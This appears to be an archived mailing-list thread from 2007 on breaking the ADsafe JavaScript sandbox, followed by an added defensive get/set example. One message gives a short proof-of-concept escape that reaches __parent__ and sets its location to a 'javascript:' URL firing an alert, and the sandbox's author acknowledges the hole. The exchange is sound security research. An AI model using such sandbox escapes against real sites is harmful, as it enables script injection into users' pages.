
Re: ADsafe, Take 2

  • collin_jackson
    Message 1 of 3 , Oct 1, 2007
      Not all dangerous dereferences are functions:

      (function() {
      var javascript = "javascript"; javascript += ":alert(42)";
      ADSAFE.get({}, "__parent__").location = javascript;
      })();

      --- In caplet@yahoogroups.com, "Douglas Crockford" <douglas@...> wrote:
      > I am now disallowing the use of subscripting. In its place, I will be
      > providing ADSAFE.get(object, name) and ADSAFE.set(object, name, value)
      > that will do checking.
      >
      > You can assume the presence of those methods. They will reject
      > requests where the typeof object or value or the returned value are
      > 'function'.
      >
      > If you can get past ADsafe to alert on any one browser, then ADsafe is
      > broken.
    • Douglas Crockford
      Message 2 of 3 , Oct 1, 2007
        --- In caplet@yahoogroups.com, "collin_jackson" <collinj@...> wrote:
        >
        > Not all dangerous dereferences are functions:
        >
        > (function() {
        > var javascript = "javascript"; javascript += ":alert(42)";
        > ADSAFE.get({}, "__parent__").location = javascript;
        > })();

        Quite right. I should have mentioned that get and put will also block
        the same members that ADsafe blocks, including names starting with _.
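A checked get/set pair in the spirit of what the two messages above describe, added here as an example; it is not ADsafe's own code and not part of the thread. The typeof rules and the ban on names starting with "_" come from the messages; the function names (isBannedName, checkedGet, checkedSet, attempt) are assumed, and ADsafe's full banned-name list is not on this page, so only the underscore rule is implemented.

```javascript
// Added example, not ADsafe's own code. Enforces the rules stated in the
// thread: reject when typeof object, value or returned value is 'function',
// and reject member names starting with "_". Only the underscore rule is
// implemented for names, since the rest of ADsafe's banned list is not on the page.

function isBannedName(name) {
  // Non-string names and anything beginning with "_" are refused; this covers
  // the __parent__ access from the thread as well as __proto__ and similar members.
  return typeof name !== 'string' || name.charAt(0) === '_';
}

function checkedGet(object, name) {
  // Refuse before touching the object when it is a function or the name is banned.
  if (typeof object === 'function' || isBannedName(name)) {
    throw new Error('ADsafe: get denied for ' + String(name));
  }
  var value = object[name];
  // The returned value is checked too: a function member is never handed back.
  if (typeof value === 'function') {
    throw new Error('ADsafe: get denied, member is a function: ' + name);
  }
  return value;
}

function checkedSet(object, name, value) {
  // Same name and object checks as get, plus the value itself must not be a function.
  if (typeof object === 'function' || typeof value === 'function' || isBannedName(name)) {
    throw new Error('ADsafe: set denied for ' + String(name));
  }
  object[name] = value;
  return value;
}

// Run one access and report whether it was denied (assumed helper for demonstration).
function attempt(fn) {
  try {
    return { denied: false, value: fn() };
  } catch (e) {
    return { denied: true, reason: e.message };
  }
}

// The access from the thread: the banned name is refused, so the .location
// assignment that followed it in the original snippet is never reached.
var probe = attempt(function () { return checkedGet({}, '__parent__'); });
// A plain data member on an ordinary object is still readable.
var ok = attempt(function () { return checkedGet({ headline: 'ad' }, 'headline'); });
```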